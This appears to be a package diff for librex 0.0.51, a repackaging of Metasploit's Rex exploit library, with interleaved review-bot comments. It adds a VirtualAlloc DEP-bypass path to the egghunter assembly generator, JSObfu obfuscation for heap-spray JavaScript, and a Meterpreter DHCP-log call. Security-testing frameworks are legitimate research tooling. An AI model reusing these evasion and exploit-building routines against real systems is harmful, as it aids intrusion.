librex 0.0.50 → 0.0.51
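--- a/data/README.markdown
+++ b/data/README.markdown
@@ -3,7 +3,7 @@
 A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
 
 Currently based on:
-SVN Revision:
+SVN Revision: 13694
 
 # Credits
 The Metasploit development team <http://www.metasploit.com>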
@@ -58,29 +58,34 @@ class Egghunter
|
|
58
58
|
end
|
59
59
|
startstub << "\n\t" if startstub.length > 0
|
60
60
|
|
61
|
-
getpointer
|
62
|
-
getsize
|
63
|
-
|
64
|
-
|
61
|
+
getpointer = ''
|
62
|
+
getsize = ''
|
63
|
+
getalloctype = ''
|
64
|
+
getpc = ''
|
65
|
+
jmppayload = "jmp edi"
|
65
66
|
|
66
|
-
apireg =
|
67
|
+
apireg = opts[:depreg] || 'esi'
|
67
68
|
apidest = opts[:depdest]
|
68
69
|
depsize = opts[:depsize]
|
69
|
-
|
70
|
+
|
70
71
|
freeregs = [ "esi", "ebp", "ecx", "ebx" ]
|
71
|
-
|
72
|
+
|
72
73
|
reginfo = {
|
73
74
|
"ebx"=>["bx","bl","bh"],
|
74
75
|
"ecx"=>["cx","cl","ch"]
|
75
76
|
}
|
76
77
|
|
77
78
|
if opts[:depmethod]
|
78
|
-
|
79
|
+
|
79
80
|
if freeregs.index(apireg) == nil
|
80
81
|
getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
|
81
82
|
apireg = freeregs[0]
|
82
83
|
end
|
83
84
|
freeregs.delete(apireg)
|
85
|
+
|
86
|
+
if opts[:depmethod].downcase == "virtualalloc"
|
87
|
+
depsize = 0xfff
|
88
|
+
end
|
84
89
|
|
85
90
|
if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
|
86
91
|
if apidest
|
@@ -94,7 +99,7 @@ class Egghunter
|
|
94
99
|
end
|
95
100
|
freeregs.delete(apidest)
|
96
101
|
end
|
97
|
-
|
102
|
+
|
98
103
|
|
99
104
|
sizereg = freeregs[0]
|
100
105
|
|
@@ -123,13 +128,11 @@ class Egghunter
|
|
123
128
|
elsif high != "00"
|
124
129
|
getsize << "mov #{regvars[2]},0x%s\n\t" % high
|
125
130
|
end
|
126
|
-
getsize << "push #{sizereg}\n\t"
|
127
131
|
end
|
128
132
|
if sizereg == "ebp"
|
129
133
|
if low != "00" and high != "00"
|
130
134
|
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
131
135
|
getsize << "mov bp,0x%s\n\t" % sizebytes
|
132
|
-
getsize << "push #{sizereg}\n\t"
|
133
136
|
end
|
134
137
|
end
|
135
138
|
# last resort
|
@@ -153,16 +156,27 @@ class Egghunter
|
|
153
156
|
if delta > 0
|
154
157
|
getsize << "add #{sizereg},0x%02x\n\t" % delta
|
155
158
|
end
|
156
|
-
getsize << "push #{sizereg}\n\t"
|
157
159
|
end
|
160
|
+
if opts[:depmethod].downcase == "virtualalloc"
|
161
|
+
getsize << "inc #{sizereg}\n\t"
|
162
|
+
end
|
163
|
+
|
164
|
+
getsize << "push #{sizereg}\n\t"
|
165
|
+
|
158
166
|
end
|
159
|
-
|
167
|
+
|
168
|
+
getalloctype = getsize
|
160
169
|
|
161
170
|
case opts[:depmethod].downcase
|
162
171
|
when "virtualprotect"
|
163
172
|
jmppayload = "push esp\n\tpush 0x40\n\t"
|
164
173
|
jmppayload << getsize
|
165
174
|
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
175
|
+
when "virtualalloc"
|
176
|
+
jmppayload = "push 0x40\n\t"
|
177
|
+
jmppayload << getalloctype
|
178
|
+
jmppayload << "push 0x01\n\t"
|
179
|
+
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
166
180
|
when "copy"
|
167
181
|
jmppayload = getpc
|
168
182
|
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
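Review bot: `getalloctype = getsize` (new line 168) binds a second name to the same String object instead of copying it, so any later `<<` on either name would change both; within this hunk the two are only read, which makes `getalloctype` a plain alias that can be dropped in favour of `getsize`, or written `getalloctype = getsize.dup` if it is meant to diverge later. The `getalloctype = ''` initialisation added in the first hunk of this file (new line 63) is then dead code, since it is always overwritten here. The three `push #{sizereg}` lines removed from the individual branches (this hunk and the one at `@@ -123,13 +128,11 @@`) are replaced by the single push at new line 164; lines 139-155 are not visible from here, so it is worth a comment at that push stating that every branch of the size computation above is expected to fall through to it, e.g. `# single push for all size-computation branches above`. The enclosing method begins before this hunk and its `case` continues after it.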
@@ -1,5 +1,6 @@
|
|
1
1
|
require 'rex/text'
|
2
2
|
require 'rex/exploitation/obfuscatejs'
|
3
|
+
require 'rex/exploitation/jsobfu'
|
3
4
|
|
4
5
|
module Rex
|
5
6
|
module Exploitation
|
@@ -43,7 +44,7 @@ class HeapLib
|
|
43
44
|
"debug",
|
44
45
|
],
|
45
46
|
"Classes" =>
|
46
|
-
[
|
47
|
+
[
|
47
48
|
{ 'Namespace' => "heapLib", 'Class' => "ie" }
|
48
49
|
],
|
49
50
|
"Namespaces" =>
|
@@ -55,8 +56,8 @@ class HeapLib
|
|
55
56
|
#
|
56
57
|
# Initializes the heap library javascript
|
57
58
|
#
|
58
|
-
def initialize(custom_js = '')
|
59
|
-
load_js(custom_js)
|
59
|
+
def initialize(custom_js = '', opts = {})
|
60
|
+
load_js(custom_js, opts)
|
60
61
|
end
|
61
62
|
|
62
63
|
#
|
@@ -71,23 +72,32 @@ protected
|
|
71
72
|
#
|
72
73
|
# Loads the raw javascript from the source file and strips out comments
|
73
74
|
#
|
74
|
-
def load_js(custom_js)
|
75
|
-
|
75
|
+
def load_js(custom_js, opts = {})
|
76
|
+
|
76
77
|
# Grab the complete javascript
|
77
|
-
File.open(JavascriptFile)
|
78
|
+
File.open(JavascriptFile) do |f|
|
78
79
|
@js = f.read
|
79
|
-
|
80
|
-
|
80
|
+
end
|
81
|
+
|
81
82
|
# Decode the text
|
82
83
|
@js = Rex::Text.decode_base64(@js)
|
83
|
-
|
84
|
+
|
84
85
|
# Append the real code
|
85
86
|
@js += "\n" + custom_js
|
86
|
-
|
87
|
-
|
87
|
+
|
88
|
+
if opts[:newobfu]
|
89
|
+
# Obfuscate the javascript using the new lexer method
|
90
|
+
@js = JSObfu.new(@js)
|
91
|
+
return @js.obfuscate
|
92
|
+
elsif opts[:noobfu]
|
93
|
+
# Do not obfuscate, let the exploit do the work (useful to avoid double obfuscation)
|
94
|
+
return @js
|
95
|
+
end
|
96
|
+
|
97
|
+
# Default to the old method
|
98
|
+
# Obfuscate the javascript using the old method
|
88
99
|
@js = ObfuscateJS.obfuscate(@js, 'Symbols' => SymbolNames)
|
89
100
|
end
|
90
|
-
|
91
101
|
end
|
92
102
|
|
93
103
|
end
|
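Review bot: In the `opts[:newobfu]` branch of `load_js` (new lines 88-91) `@js` is reassigned to the `JSObfu` instance and only the return value carries the result of `obfuscate`, while `initialize` (hunk `@@ -55,8 +56,8 @@`) discards what `load_js` returns, so after construction `@js` holds a `JSObfu` object on that path and a String on the other two. Unless `JSObfu#obfuscate` rewrites the object in place (not visible here), the branch should store the result, `@js = JSObfu.new(@js).obfuscate`, and both `return`s can go so that `@js` is a String on every path. The comment block above `load_js` should also name the two new options, e.g. `# opts[:newobfu] - obfuscate with JSObfu; opts[:noobfu] - leave the script unobfuscated; default is ObfuscateJS`.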
@@ -57,6 +57,20 @@ class Lanattacks < Extension
|
|
57
57
|
true
|
58
58
|
end
|
59
59
|
|
60
|
+
def dhcp_log
|
61
|
+
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
|
62
|
+
entries = []
|
63
|
+
if( response.result == 0 )
|
64
|
+
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
|
65
|
+
while log.length > 0
|
66
|
+
mac = log.slice!(0..5)
|
67
|
+
ip = log.slice!(0..3)
|
68
|
+
entries << [ mac, ip ]
|
69
|
+
end
|
70
|
+
end
|
71
|
+
entries
|
72
|
+
end
|
73
|
+
|
60
74
|
def start_tftp
|
61
75
|
client.send_request(Packet.create_request('lanattacks_start_tftp'))
|
62
76
|
true
|
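Review bot: `dhcp_log` (new lines 60-72) treats the `TLV_TYPE_LANATTACKS_RAW` value as well-formed: if `get_tlv_value` returns nil for a missing TLV the `log.length` call raises, and a blob whose length is not a multiple of 10 makes the last iteration append a truncated `[mac, ip]` pair, because `slice!` simply returns whatever bytes remain. The loop also mutates the TLV value in place through `slice!`, and the record layout it assumes (a 6-byte MAC followed by a 4-byte IPv4 address, inferred from the slice ranges) is not stated anywhere. Parsing the value as fixed 10-byte records removes the per-iteration mutation and ignores a trailing partial record instead of returning it truncated; raising on a partial record would be the stricter alternative if the caller needs to know. `start_tftp` below the added method is unchanged.
```ruby
def dhcp_log
  response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
  return [] unless response.result == 0
  # Each record is a 6-byte MAC followed by a 4-byte IPv4 address. The value
  # comes back from the remote side, so it is not assumed to be present or
  # whole: a missing TLV yields [], and a trailing partial record is dropped.
  raw = response.get_tlv_value(TLV_TYPE_LANATTACKS_RAW).to_s
  raw.unpack('a10' * (raw.length / 10)).map { |rec| rec.unpack('a6a4') }
end
```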
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: librex
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.0.
|
4
|
+
version: 0.0.51
|
5
5
|
prerelease:
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
@@ -10,10 +10,10 @@ authors:
|
|
10
10
|
autorequire:
|
11
11
|
bindir: bin
|
12
12
|
cert_chain: []
|
13
|
-
date: 2011-
|
13
|
+
date: 2011-09-05 00:00:00.000000000Z
|
14
14
|
dependencies: []
|
15
15
|
description: Rex provides a variety of classes useful for security testing and exploit
|
16
|
-
development. Based on SVN Revision
|
16
|
+
development. Based on SVN Revision 13694
|
17
17
|
email:
|
18
18
|
- hdm@metasploit.com
|
19
19
|
- jacob.hammack@hammackj.com
|